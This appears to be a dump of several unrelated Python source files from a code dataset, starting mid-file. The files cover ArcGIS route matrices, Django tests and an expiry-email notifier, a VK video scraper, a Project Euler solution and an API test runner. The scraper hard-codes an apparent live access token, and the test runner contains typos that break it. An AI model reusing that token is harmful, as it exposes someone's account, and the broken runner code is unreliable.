in origin_ranges)\r\n else:\r\n max_destinations = destinations_count - max_od_size\r\n max_origins = max_od_size // max_destinations\r\n origin_ranges = itertools.zip_longest(range(1, origins_count + 1, max_origins),\r\n range(max_origins, origins_count + 1, max_origins),\r\n fillvalue=origins_count)\r\n dest_ranges = itertools.zip_longest(range(1, destinations_count + 1, max_destinations),\r\n range(max_destinations, destinations_count + 1, max_destinations),\r\n fillvalue=destinations_count)\r\n od_ranges = itertools.product(origin_ranges, dest_ranges)\r\n return od_ranges\r\n\r\n @staticmethod\r\n def get_oid_ranges_agol(origins_count, destinations_count, max_origins, max_destinations):\r\n \"\"\"Return an iterable of OIDs ranges for origins and destinations based on max origins and max destinations.\r\n\r\n Args:\r\n origins_count: Total number of origins.\r\n destinations_count: Total number of destinations.\r\n max_origins: The maximum number of origins supported by the agol od service.\r\n max_destinations: The maximum number of destinations supported by the agol od service.\r\n Returns:\r\n An iterable where each element is a tuple containing lower and upper bound OIDs for origins and\r\n destinations to process in each iteration. For example get_oid_ranges_agol(1500, 1200, 1000, 1000) will\r\n return an iterable such as [((1, 1000), (1, 1000)), ((1, 1000), (1001, 1200)),\r\n ((1001, 1500), (1, 1000)), ((1001, 1500), (1001, 1200))]\r\n\r\n \"\"\"\r\n od_ranges = []\r\n if destinations_count <= max_destinations:\r\n origin_ranges = itertools.zip_longest(range(1, origins_count + 1, max_origins),\r\n range(max_origins, origins_count + 1, max_origins),\r\n fillvalue=origins_count)\r\n od_ranges = ((val, (1, destinations_count)) for val in origin_ranges)\r\n else:\r\n origin_ranges = itertools.zip_longest(range(1, origins_count + 1, max_origins),\r\n range(max_origins, origins_count + 1, max_origins),\r\n fillvalue=origins_count)\r\n dest_ranges = itertools.zip_longest(range(1, destinations_count + 1, max_destinations),\r\n range(max_destinations, destinations_count + 1, max_destinations),\r\n fillvalue=destinations_count)\r\n od_ranges = itertools.product(origin_ranges, dest_ranges)\r\n return od_ranges\r\n\r\n @staticmethod\r\n def setup_logger(logger_obj):\r\n \"\"\"Set up the logger used for logging messages.\r\n\r\n Args:\r\n logger_obj: The logger instance.\r\n\r\n \"\"\"\r\n logger_obj.setLevel(logging.DEBUG)\r\n # logger_obj.propagate = False\r\n if len(logger_obj.handlers) <= 1:\r\n console_handler = logging.StreamHandler()\r\n console_formatter = logging.Formatter(\"%(process)d | %(message)s\")\r\n console_handler.setFormatter(console_formatter)\r\n console_handler.setLevel(logging.DEBUG)\r\n logger_obj.addHandler(console_handler)\r\n\r\n @staticmethod\r\n def is_nds_service(network_data_source):\r\n \"\"\"Return true if the network data source points to a service.\"\"\"\r\n return True if network_data_source.startswith(\"http\") else False\r\n\r\n @staticmethod\r\n def get_service_toolbox(routing_utils_url):\r\n \"\"\"Return the remote toolbox for a portal utility service.\r\n\r\n Args:\r\n routing_utils_url: The URL of the routing utilities service configured with the portal.\r\n Returns:\r\n A named tuple representing a remote toolbox. The toolbox property of the named tuple can be used with\r\n arcpy.ImportToolbox.\r\n Raises:\r\n A ValueError if the utility service is not configured\r\n\r\n \"\"\"\r\n RemoteToolInfo = namedtuple(\"RemoteToolInfo\", (\"service_name\", \"toolbox\")) # pylint: disable=invalid-name\r\n\r\n # Get the service name, folder name and SOAP URL for the utility service.\r\n folder_url, service_name = os.path.split(os.path.dirname(routing_utils_url))\r\n rest_url, folder_name = os.path.split(folder_url)\r\n soap_url = rest_url.replace(\"/rest/\", \"/\")\r\n\r\n tbx = f\"{soap_url};{folder_name}/{service_name};UseSSOIdentityIfPortalOwned\"\r\n return RemoteToolInfo(service_name, tbx)\r\n\r\n @staticmethod\r\n def get_tool_limits(portal_url, service_name=\"asyncODCostMatrix\",\r\n tool_name=\"GenerateOriginDestinationCostMatrix\"):\r\n \"\"\"Return a dictionary of various limits supported by a portal tool.\r\n\r\n Args:\r\n portal_url: The URL of the active portal that is used as the network dataset source.\r\n service_name: The name of the utility service configured with the portal to perform a given analysis.\r\n tool_name: The name of the tool within the service that performs the analysis.\r\n Returns:\r\n A dictionary with key as limit name and value as limit value.\r\n\r\n \"\"\"\r\n if not portal_url.endswith(\"/\"):\r\n portal_url = portal_url + \"/\"\r\n tool_limits = arcpy.na.GetWebToolInfo(service_name, tool_name, portal_url)\r\n return tool_limits[\"serviceLimits\"]\r\n\r\n\r\ndef solve_od_cost_matrix(inputs, chunk):\r\n \"\"\"Solve OD cost matrix on a separate process for each iteration.\r\n\r\n Args:\r\n inputs: An iterable of dictionaries containing the inputs such as origins and destinations to process for each\r\n iteration.\r\n chunk: An iterable of OID ranges for origins and destinations defining the origins and destinations that will be\r\n processed in each iteration.\r\n Returns:\r\n A dictionary which contains information about the result. The dictionary has the following keys:\r\n \"jobId\" -- A unique ID\r\n \"jobFolder\" -- Folder that stores intermidiate results\r\n \"solveSucceeded\" -- Status of the OD cost matrix solve\r\n \"solveMessages\" -- Messages from the OD cost matrix solve\r\n \"outputLines\" -- Catalog path to the feature class storing output OD cost matrix lines\r\n \"outputLayerFile\" -- Catalog path to the layer file for OD cost matrix solve\r\n\r\n \"\"\"\r\n odcm = ODCostMatrix(**inputs)\r\n logger.info(\"Processing origins OID %s to %s and destinations OID %s to %s as job id %s\",\r\n chunk[0][0], chunk[0][1], chunk[1][0], chunk[1][1], odcm.job_id)\r\n odcm.solve(chunk[0], chunk[1])\r\n result = odcm.job_result\r\n logger.debug(\"Saved OD lines at %s\", result[\"outputLines\"])\r\n return result\r\n\r\n\r\ndef main(**inputs): # pylint:disable = too-many-locals, too-many-statements, too-many-branches\r\n \"\"\"Preprocess inputs, compute OD cost matrix and postprocess outputs.\"\"\"\r\n # Create the output workspace\r\n out_gdb_name = \"outputs\"\r\n out_gdb = os.path.join(inputs[\"output_folder\"], out_gdb_name + \".gdb\")\r\n if not os.path.exists(out_gdb):\r\n arcpy.management.CreateFileGDB(inputs[\"output_folder\"], out_gdb_name)\r\n\r\n # Preprocess inputs\r\n pp_origins = ODCostMatrix.preprocess_inputs(inputs[\"origins\"], inputs[\"network_data_source\"], inputs[\"travel_mode\"],\r\n out_gdb)\r\n pp_destinations = ODCostMatrix.preprocess_inputs(inputs[\"destinations\"], inputs[\"network_data_source\"],\r\n inputs[\"travel_mode\"], out_gdb)\r\n\r\n inputs[\"origins\"] = pp_origins\r\n inputs[\"destinations\"] = pp_destinations\r\n\r\n # Store count of input origins and destinations\r\n origins_count = int(arcpy.management.GetCount(inputs[\"origins\"]).getOutput(0))\r\n destinations_count = int(arcpy.management.GetCount(inputs[\"destinations\"]).getOutput(0))\r\n\r\n # Determine if working with online or enterprise portal\r\n network_data_source = inputs[\"network_data_source\"]\r\n is_agol = False\r\n portal_desc = {}\r\n if ODCostMatrix.is_nds_service(network_data_source):\r\n logger.debug(\"Getting information from the portal\")\r\n portal_desc = arcpy.GetPortalDescription(network_data_source)\r\n inputs[\"portal_description\"] = portal_desc\r\n is_agol = not portal_desc[\"isPortal\"]\r\n\r\n # Get iterables for the inputs\r\n if is_agol:\r\n # Get the max origins and max destinations if working with AGOL\r\n tool_limits = ODCostMatrix.get_tool_limits(network_data_source)\r\n max_origins = int(tool_limits[\"maximumOrigins\"])\r\n max_destinations = int(tool_limits[\"maximumDestinations\"])\r\n # Chunk origin and destination OID ranges based on max origins and max destinations\r\n ranges = ODCostMatrix.get_oid_ranges_agol(origins_count, destinations_count, max_origins, max_destinations)\r\n # Adjust properties specific to working with AGOL service.\r\n inputs[\"workers\"] = min(4, inputs[\"workers\"])\r\n inputs[\"max_od_size\"] = max_origins * max_destinations\r\n else:\r\n ranges = ODCostMatrix.get_oid_ranges(origins_count, destinations_count, inputs[\"max_od_size\"])\r\n\r\n inputs_iter = itertools.repeat(inputs)\r\n\r\n # Compute OD cost matrix\r\n od_line_fcs = []\r\n job_folders_to_delete = []\r\n # Run on multiple processes when solving large ODs\r\n if origins_count * destinations_count > inputs[\"max_od_size\"]:\r\n with futures.ProcessPoolExecutor(max_workers=inputs[\"workers\"]) as executors:\r\n results = executors.map(solve_od_cost_matrix, inputs_iter, ranges)\r\n # Compute a list of od results from each iteration if the solve is successful.\r\n for result in results:\r\n if result[\"solveSucceeded\"]:\r\n od_line_fcs.append(result[\"outputLines\"])\r\n job_folders_to_delete.append(result[\"jobFolder\"])\r\n else:\r\n logger.warning(\"Solve failed for job id %s\", result[\"jobId\"])\r\n logger.debug(result[\"solveMessages\"])\r\n else:\r\n result = solve_od_cost_matrix(inputs, [(1, origins_count), (1, destinations_count)])\r\n if result[\"solveSucceeded\"]:\r\n od_line_fcs.append(result[\"outputLines\"])\r\n job_folders_to_delete.append(result[\"jobFolder\"])\r\n else:\r\n logger.warning(\"Solve failed for job id %s\", result[\"jobId\"])\r\n logger.debug(result[\"solveMessages\"])\r\n\r\n # Merge individual OD matrix feature classes into a single feature class\r\n if od_line_fcs:\r\n output_od_name = \"od_\" + pp_origins[-7:-2]\r\n output_fc = arcpy.CreateUniqueName(output_od_name, out_gdb)\r\n logger.info(\"Merging results to %s\", output_fc)\r\n result = arcpy.management.Merge(od_line_fcs, output_fc)\r\n logger.debug(result.getMessages().split(\"\\n\")[-1])\r\n\r\n # Cleanup\r\n # Delete the job folders if the job succeeded\r\n for folder in job_folders_to_delete:\r\n logger.debug(\"Deleting %s\", folder)\r\n shutil.rmtree(folder, ignore_errors=True)\r\n\r\n # Delete the preprocessed inputs\r\n arcpy.management.Delete(pp_origins)\r\n arcpy.management.Delete(pp_destinations)\r\n\r\n\r\ndef _cli():\r\n # Changed the Command Line Interface code to use a list of dictionaries that are then iterated\r\n # This allows for\r\n \"\"\"Command line interface for the tool.\r\n # Create the parser\r\n parser = argparse.ArgumentParser(description=globals().get(\"__doc__\", \"\"), fromfile_prefix_chars='@')\r\n\r\n # Define Arguments supported by the command line utility\r\n\r\n # --origins parameter\r\n help_string = \"The full catalog path to the feature class containing the origins.\"\r\n parser.add_argument(\"-o\", \"--origins\", action=\"store\", dest=\"origins\", help=help_string, required=True)\r\n\r\n # --destinations parameter\r\n help_string = \"The full catalog path to the feature class containing the destinations.\"\r\n parser.add_argument(\"-d\", \"--destinations\", action=\"store\", dest=\"destinations\", help=help_string, required=True)\r\n\r\n # --network-data-source parameter\r\n help_string = \"The full catalog path to the network dataset or a portal url that will be used for the analysis.\"\r\n parser.add_argument(\"-n\", \"--network-data-source\", action=\"store\", dest=\"network_data_source\", help=help_string,\r\n required=True)\r\n\r\n # --travel-mode parameter\r\n help_string = (\"The name of the travel mode from the network data source that should be used for the analysis. \"\r\n 'If the travel mode name has spaces, enclose the name in double quotes such as \"Driving Time\"')\r\n parser.add_argument(\"-t\", \"--travel-mode\", action=\"store\", dest=\"travel_mode\", help=help_string, required=True)\r\n\r\n # --output-folder parameter\r\n help_string = \"The full catalog path to an existing folder where the tool will create the outputs.\"\r\n parser.add_argument(\"-f\", \"--folder\", action=\"store\", dest=\"output_folder\", help=help_string, required=True)\r\n\r\n # --cutoff parameter\r\n help_string = (\"The impedance value at which to stop searching for destinations for a given origin in the units of\"\r\n \" the impedance attribute used by your chosen travel mode. By default no cutoff is used.\")\r\n parser.add_argument(\"-c\", \"--cutoff\", action=\"store\", type=float, dest=\"cutoff\", help=help_string, default=0)\r\n\r\n # --target-count parameter\r\n help_string = (\"The number of destinations to find per origin. By default, no limit is used, and all destinations\"\r\n \" are found.\")\r\n parser.add_argument(\"-T\", \"--target-count\", action=\"store\", type=int, dest=\"target_count\", help=help_string,\r\n default=0)\r\n\r\n # --workers parameter\r\n help_string = (\"The number of parallel process to use for the analysis. The default is 2. When solving against a \"\r\n \"local network dataset, this number should be set equal to the number of physical CPU cores on your \"\r\n \"machine to achieve maximum performance. When solving against a service, this number should be set \"\r\n \"equal to the number of instances available for the service.\")\r\n parser.add_argument(\"-w\", \"--workers\", action=\"store\", type=int, dest=\"workers\", help=help_string, default=2)\r\n\r\n # --max-od-size parameter\r\n max_od_size = 5000000\r\n help_string = (f\"The maximum number of rows that should be present in a single od cost matrix feature class. \"\r\n \"This number governs how many origins and destinations are processed in one iteration. \"\r\n \"For example, if you have 500 origins and 100 destinations and maximum od size is 10,000, \"\r\n \"each iteration will process 100 origins and 100 destinations. The default is {max_od_size}\")\r\n parser.add_argument(\"-m\", \"--max-od-size\", action=\"store\", type=int, dest=\"max_od_size\", help=help_string,\r\n default=max_od_size)\r\n \"\"\"\r\n # import OhioCountyODArgsDictionary39111 as arg\r\n # import OhioCountyODArgsDictionary39061 as arg\r\n import OhioCountyODArgsDictionary39111 as arg\r\n\r\n # Get arguments as dictionary.\r\n # args = vars(parser.parse_args())\r\n\r\n # argslist = [\r\n # {'origins': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\OhioCountyZIP4PnP_ESPG102723\\\\OH_ZIP4_39001_1',\r\n # 'destinations': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\POI_FSR_733513_ESPG102723\\\\OH_LSR_722513_39001_1',\r\n # 'network_data_source': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\RouteFinder_ESPG102723\\\\RF_OH_ESPG102723_ND',\r\n # 'travel_mode': 'Driving Distance',\r\n # 'output_folder': 'D:\\\\ArcGISProjects\\\\ODCMTesting',\r\n # 'cutoff': 26400.0,\r\n # 'target_count': 0,\r\n # 'workers': 12,\r\n # 'max_od_size': 1000000},\r\n # {\r\n # 'origins': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\OhioCountyZIP4PnP_ESPG102723\\\\OH_ZIP4_39003_1',\r\n # 'destinations': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\POI_FSR_733513_ESPG102723\\\\OH_LSR_722513_39003_1',\r\n # 'network_data_source': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\RouteFinder_ESPG102723\\\\RF_OH_ESPG102723_ND',\r\n # 'travel_mode': 'Driving Distance',\r\n # 'output_folder': 'D:\\\\ArcGISProjects\\\\ODCMTesting',\r\n # 'cutoff': 26400.0,\r\n # 'target_count': 0,\r\n # 'workers': 12,\r\n # 'max_od_size': 1000000},\r\n # {\r\n # 'origins': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\OhioCountyZIP4PnP_ESPG102723\\\\OH_ZIP4_39005_1',\r\n # 'destinations': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\POI_FSR_733513_ESPG102723\\\\OH_LSR_722513_39005_1',\r\n # 'network_data_source': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\RouteFinder_ESPG102723\\\\RF_OH_ESPG102723_ND',\r\n # 'travel_mode': 'Driving Distance',\r\n # 'output_folder': 'D:\\\\ArcGISProjects\\\\ODCMTesting',\r\n # 'cutoff': 26400.0,\r\n # 'target_count': 0,\r\n # 'workers': 12,\r\n # 'max_od_size': 1000000},\r\n # {\r\n # 'origins': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\OhioCountyZIP4PnP_ESPG102723\\\\OH_ZIP4_39007_1',\r\n # 'destinations': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\POI_FSR_733513_ESPG102723\\\\OH_LSR_722513_39007_1',\r\n # 'network_data_source': 'D:\\\\ArcGISProjects\\\\ODCMTesting\\\\OCDMOhioData.gdb\\\\RouteFinder_ESPG102723\\\\RF_OH_ESPG102723_ND',\r\n # 'travel_mode': 'Driving Distance',\r\n # 'output_folder': 'D:\\\\ArcGISProjects\\\\ODCMTesting',\r\n # 'cutoff': 26400.0,\r\n # 'target_count': 0,\r\n # 'workers': 12,\r\n # 'max_od_size': 1000000}\r\n # ]\r\n\r\n\r\n for args in arg.argslist:\r\n # Convert cutoff and target_count to None if they are not specified.\r\n cutoff = args[\"cutoff\"]\r\n target_count = args[\"target_count\"]\r\n args[\"cutoff\"] = cutoff if cutoff else None\r\n args[\"target_count\"] = target_count if target_count else None\r\n\r\n # setup the module logger\r\n ODCostMatrix.setup_logger(logger)\r\n\r\n # call the main execution\r\n start_time = time.time()\r\n main(**args)\r\n logger.info(\"Completed in %.2f minutes\", (time.time() - start_time) / 60)\r\n\r\n# Run MAIN\r\nif __name__ == \"__main__\":\r\n _cli()\r\n","sub_path":"odcm.py","file_name":"odcm.py","file_ext":"py","file_size_in_byte":46975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"492357190","text":"from django.test import TestCase\nfrom models import Usage\nfrom models import MachineGroups\nfrom models import MachineCategory\nfrom django.forms.models import model_to_dict\n# from util import email_alert\nfrom util import testExecTime\n# Create your tests here.\nimport logging\nlogger = logging.getLogger(__name__)\nclass UsageTestCase(TestCase):\n fixtures = ['machine_status']\n\n # def testSentEmail(self):\n # email_alert('xud@sybase.com','test Sent text','This is a test email, test sent to ability.')\n # email_alert('xud@sybase.com','test Sent html','test

Test

This is a test email, test sent to ability.')\n # email_alert('xud@sybase.com','test CC','This is a test email, test CC ability.',cc=['xud@sybase.com'])\n # email_alert('xud@sybase.com','test BCC','This is a test email, test BCC ability.',bcc=['xud@sybase.com'])\n # logger.info(\"Please check you mailbox, 3 mails should be received.\")\n # return True\n\n def testImportModes(self):\n self.assertGreater(MachineCategory.objects.all(),0,'MachineCategory data not load.')\n self.assertGreater(MachineGroups.objects.all(),0,'MachineGroups data not load.')\n self.assertGreater(Usage.objects.all(),0,'Usage data not load.')\n\n def testGetUsagePerf(self):\n def toDict(machine):\n # obj_dict = Machine.objects.filter(id=self.id).values()[0]\n obj_dict = model_to_dict(machine)\n try:\n obj_dict['perf_rating'] = machine.perf_rating(self.groups.all()[0])\n obj_dict['machine_status'] = machine.getMachineStatus(machine.groups.all()[0]).__dict__\n except:\n obj_dict['perf_rating'] = 'NA'\n obj_dict['machine_status'] = 'NA'\n\n # do not call toDict() method for item object again\n # obj_dict['mon_items'] = map(model_to_dict, iter(self.item_set.all()))\n obj_dict['mon_items'] = machine.dumpItems()\n obj_dict['quasr_space'] = machine.quasrspaceSize\n obj_dict['reserved'] = machine.reserved\n obj_dict['reserve_type'] = machine.reserve_type\n obj_dict['lastUpdate'] = machine.lastUpdate\n\n def toDictNoStatus(machine):\n # obj_dict = Machine.objects.filter(id=self.id).values()[0]\n obj_dict = model_to_dict(machine)\n\n # do not call toDict() method for item object again\n # obj_dict['mon_items'] = map(model_to_dict, iter(self.item_set.all()))\n obj_dict['mon_items'] = machine.dumpItems()\n # obj_dict['quasr_space'] = machine.quasrspaceSize\n # obj_dict['reserved'] = machine.reserved\n obj_dict['reserve_type'] = machine.reserve_type\n obj_dict['lastUpdate'] = machine.lastUpdate\n\n usage = Usage.objects.get(id=1)\n machines = usage.machine_set.all()\n for m in machines:\n testExecTime(toDict,m)\n for m in machines:\n testExecTime(toDictNoStatus,m)\n\n testExecTime(lambda :map(lambda m:toDict(m),iter(machines)))\n testExecTime(lambda :map(lambda m:toDictNoStatus(m),iter(machines)))\n\n def testShowUsage(self):\n response = self.client.get('ui5/showusage/1/')\n self.assertEqual(response.status_code,'200','Not get correct status code, but get %s'%response.status_code)","sub_path":"machine_status/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"593303293","text":"from django.core.management.base import BaseCommand, CommandError\nfrom ppm.models import SafetyTrainingRecord, SubscribedService, MiscCredentialRecord, EmailNotification\nfrom django.core.mail import EmailMessage\nfrom django.db.models import Q\nimport datetime\n\n\nclass Command(BaseCommand):\n help = 'Expired training notifier'\n\n def handle(self, *args, **options):\n emails = self.get_ppm_emails()\n training = self.get_training()\n credentials = self.get_credentials()\n\n #self.send_notifications('ofp.101@gmail.com', list, 'Teal Construction')\n self.check_dates(emails, training, 'training')\n self.check_dates(emails, credentials, 'credential')\n\n def check_dates(self, emails, training, training_type):\n # Get today's date\n today = datetime.date.today()\n\n # Iterate through each email and send the list of expired emails\n for e in emails:\n notification_list = []\n\n for t in training:\n if not self.get_subscribed_service(t.group_id):\n continue\n if t.expiration_date is None:\n continue\n\n # Check whether training is safety training or misc credentials\n course = self.check_training_type(t, training_type)\n\n # Make sure the email belongs to the group.\n if t.group_id == e.group_id:\n company = t.group.name\n employee = t.profile.first_name + ' ' + t.profile.last_name\n formated_date = t.expiration_date.strftime('%b %d, %Y')\n\n # Check to see if t.expiration_date is (N) days before, past or today\n if today + datetime.timedelta(days=90) == t.expiration_date:\n notice = \"%s's %s will expire in 90 days on %s\" % (employee, course, formated_date)\n notification_list.append(notice)\n elif today + datetime.timedelta(days=60) == t.expiration_date:\n notice = \"%s's %s will expire in 60 days on %s\" % (employee, course, formated_date)\n notification_list.append(notice)\n elif today + datetime.timedelta(days=30) == t.expiration_date:\n notice = \"%s's %s will expire in 30 days on %s\" % (employee, course, formated_date)\n notification_list.append(notice)\n elif t.expiration_date == today:\n notice = \"%s's %s expires today\" % (employee, course)\n notification_list.append(notice)\n elif today + datetime.timedelta(days=-30) == t.expiration_date:\n notice = \"%s's %s expired 30 days ago on %s. FINAL NOTICE. \" % (employee, course, formated_date)\n notification_list.append(notice)\n\n if notification_list:\n self.send_notifications(e.email, notification_list, company)\n\n def check_training_type(self, t_obj, training_type):\n if training_type == 'training':\n return t_obj.course.name\n elif training_type == 'credential':\n return t_obj.credential.name\n\n def get_training(self):\n training = SafetyTrainingRecord.objects.filter(profile__is_active=1).order_by('profile__first_name')\n return training\n\n def get_credentials(self):\n credentials = MiscCredentialRecord.objects.filter(profile__is_active=1).order_by('profile__first_name')\n return credentials\n\n def get_ppm_emails(self):\n emails = EmailNotification.objects.filter(app__in=['All', 'PPM'])\n return emails\n\n def get_subscribed_service(self, group_id):\n service = SubscribedService.objects.get(group_id=group_id)\n return service.ppm\n\n def send_notifications(self, email, notification_list, company):\n print(notification_list)\n msg = EmailMessage('Expired Training Records', self.message(notification_list, company),\n 'do-not-reply@csc-safety.com',\n to=[email, 'notifications@intelligent-d2.com'])\n msg.content_subtype = 'html'\n msg.send()\n\n def message(self, notification_list, company):\n date = datetime.date.today().strftime('%b %d, %Y')\n message = \"\"\"\\\n \n \n \n Compliance Safety Consulting\n \n \n \n \n \n \n \n\n \"\"\"\n for row in notification_list:\n message += ''\n message += \"\"\"\\\n
\n \n \n

\"\"\" + company + \"\"\": Expiration list generated on \"\"\" + str(date) + \"\"\"

\n
' + row + '
\n \n \n \"\"\"\n return message\n","sub_path":"ppm/management/commands/expired_training_notifier.py","file_name":"expired_training_notifier.py","file_ext":"py","file_size_in_byte":5363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"476995066","text":"# -*- coding: utf-8 -*-\nimport requests\nimport os, time\naccess_token = \"261beb8cbe14581fd4c8edf0805d505a05d439816bc27beedd9051b75ce84e768a100d149727811aeb5a8\"\ndef get_a():\n vk_id = \"67267231\" # skynet\n #vk_id = \"47376425\" #цифровая копия\n URL = f\"https://api.vk.com/method/video.getAlbums?owner_id=-{vk_id}&access_token={access_token}&v=5.92\"\n r = requests.get(url = URL) \n data = r.json() \n FLINK = open(\"video_link.txt\",\"w\")\n for G in data['response']['items']:\n URL_get = f\"https://api.vk.com/method/video.get?owner_id=-{vk_id}&album_id={G['id']}&access_token={access_token}&v=5.92\"\n r = requests.get(url = URL_get).json() \n time.sleep(0.5)\n try:\n for o in r['response']['items']:\n print (o['player']) #[0]['url'] \n FLINK.write(f\"{o['player']};{G['title']}\\n\")\n except KeyError:\n print (r)\n \n FLINK.close() \nget_a()\n","sub_path":"vk parsing/get_data_skynet_v.py","file_name":"get_data_skynet_v.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"477762881","text":"\"\"\"\nMichael S. Emanuel\nFri Oct 21 15:48:47 2016\n\nNumber letter counts\nProblem 17\n\nIf the numbers 1 to 5 are written out in words: one, two, three, four, five,\nthen there are 3 + 3 + 5 + 4 + 4 = 19 letters used in total.\n\nIf all the numbers from 1 to 1000 (one thousand) inclusive were written out in words,\nhow many letters would be used?\n\nNOTE: Do not count spaces or hyphens.\nFor example, 342 (three hundred and forty-two) contains 23 letters and\n115 (one hundred and fifteen) contains 20 letters.\nThe use of \"and\" when writing out numbers is in compliance with British usage.\n\"\"\"\n\nfrom Euler.Utility import range_inc\nfrom typing import Dict\n\n\ndef numLen(n: int, nw: Dict[int, str]) -> int:\n w = nw[n]\n w = w.replace(' ', '')\n w = w.replace('-', '')\n return len(w)\n\n\ndef makeNumWord() -> Dict[int, str]:\n \"\"\"Build a dictionary numword.\"\"\"\n # Dictionary numword\n # key = integer n, value = string of word\n nw: Dict[int, str] = {}\n # 1-10\n nw[1] = 'one'\n nw[2] = 'two'\n nw[3] = 'three'\n nw[4] = 'four'\n nw[5] = 'five'\n nw[6] = 'six'\n nw[7] = 'seven'\n nw[8] = 'eight'\n nw[9] = 'nine'\n nw[10] = 'ten'\n # 11-19\n nw[11] = 'eleven'\n nw[12] = 'twelve'\n nw[13] = 'thirteen'\n nw[14] = 'fourteen'\n nw[15] = 'fifteen'\n nw[16] = 'sixteen'\n nw[17] = 'seventeen'\n nw[18] = 'eighteen'\n nw[19] = 'nineteen'\n # Multiples of 10 from 20 to 100\n nw[20] = 'twenty'\n nw[30] = 'thirty'\n nw[40] = 'forty'\n nw[50] = 'fifty'\n nw[60] = 'sixty'\n nw[70] = 'seventy'\n nw[80] = 'eighty'\n nw[90] = 'ninety'\n # Finally need 1000\n nw[1000] = 'one thousand'\n\n # Fill in other numbers between 21 and 100\n n1: int\n n2: int\n n3: int\n for n2 in range(20, 100, 10):\n # n2 is the tens place\n # w2 is the word form\n w2: str = nw[n2]\n for n1 in range(1, 10):\n # n1 is the ones place\n # n is the sum of the multiple of 10 and the ones place\n n: int = n2 + n1\n # The word form of n2\n w1: str = nw[n1]\n # The word is just TensWord-OnesWord\n nw[n] = w2 + '-' + w1\n\n # Fill in other numbers between 100 and 1000\n # n3 is the multiple of 100\n for n3 in range(100, 1000, 100):\n # d3 = n3 // 100\n w3 = nw[n3 // 100] + ' hundred'\n nw[n3] = w3\n for n21 in range(1, 100):\n n = n3 + n21\n # w = w3 + ' and ' + nw[n21]\n nw[n] = w3 + ' and ' + nw[n21]\n # Sanity check: nw should have exactly 1000 entries\n assert len(nw) == 1000\n return nw\n\n\ndef main() -> int:\n # Generate the numword table\n nw = makeNumWord()\n # Add up string lengths\n stringLen = sum(numLen(n, nw) for n in range_inc(1000))\n # Print answer\n print(f'The count of letters in the numbers from 1 to 1000 is {stringLen}.')\n return stringLen\n\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()\n","sub_path":"Prob017_NumberLetterCount.py","file_name":"Prob017_NumberLetterCount.py","file_ext":"py","file_size_in_byte":2966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"518426221","text":"#!/usr/bin/python\n#coding:utf-8\n'''执行测试用例,记录测试结果和输出测试报告'''\n\nfrom log import logger\nfrom pathlib import Path\nfrom utils import Excel,to_json\nfrom data import replace\nimport httpcaps\n\nclass Testcase:\n def __init__(self,testcase,junit):\n self.junit = junit\n self.testcase = testcase\n self.file_element = str(Path('elements')/('elements.xlsx'))\n self.excel_element = Excel.readExcel(self.file_element)\n self.element_data = self.excel_element.red()\n self.elements = to_json(self.element_data[1:])\n self.step_fail = 0\n self.step_error = 0\n self.errors_detail = ''\n def run(self):\n steps=[]\n for index, step in enumrate(self.testcase['step']):\n try:\n url = self.elements['baseurl']['url'] + self.elements[step['element']]['url']\n sort = self.elements[step['element']]['type']\n step['element'] = url.strip()\n if step['data']:\n step['data'] = replace(str(step['data']))\n result_json = getattr(httpcaps, 'http_requests')(step, self.junit,sort)\n if result_json['score'] != 'Pass':\n self.step_fail += 1\n steps.append(result_json)\n except Exception as e:\n step['score'] = 'Fail'\n step['_resultinfo'] = 'exception: %s' % e\n self.step_error += 1\n logger.info(step)\n self.junit.failure(\n 'testdot:' + step['testdot'] + '-' + 'step:' + step['no'] + '-' + 'element:' + step['element'] + '-' + 'error:%s' % e\n )\n self.error_detail += step['testdot'] + '--' + '{}'.format(e)\n steps.append(step)\n logger.error('error:interface and element not found%s' % e)\n logger.error('error:%s' % e)\n self.junit.suite(self.step_error,self.step_fail,len(self.testcase),'')\n self.junit.settime()\n #记录生成的测试结果,生成测试报告excel版本\n self.testcase['step'] = steps\n return self.testcase","sub_path":"mytestcase/control/testcase.py","file_name":"testcase.py","file_ext":"py","file_size_in_byte":2166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"12946708","text":"import json\nimport os.path\n\nbig_malt_list = []\nbig_hop_list = []\nbig_yeast_list = []\n\ndef dump_to_json(type, list):\n data_path = os.path.dirname(__file__)\n json_object = json.dumps(list, indent = 4)\n with open(data_path+\"/\"+type+\"_datas.json\", \"w\") as outfile:\n outfile.write(json_object)\n\nif __name__ == \"__main__\":\n import sys\n sys.path.append(os.path.dirname(__file__)+\"/shops\")\n from shops import *\n arr = os.listdir(os.path.dirname(__file__)+\"/shops\")\n for file in arr:\n if file != \"__init__.py\" and file != \"__pycache__\" and file !=\"template.py\" and \".py\" in file and \"olasz\" not in file:\n run = file.replace(\".py\",\"\")+\".crawl_malts()\"\n locals = {}\n list = exec(\"list = \"+run, None, locals)\n big_malt_list.extend(locals[\"list\"])\n\n run = file.replace(\".py\",\"\")+\".crawl_hops()\"\n locals 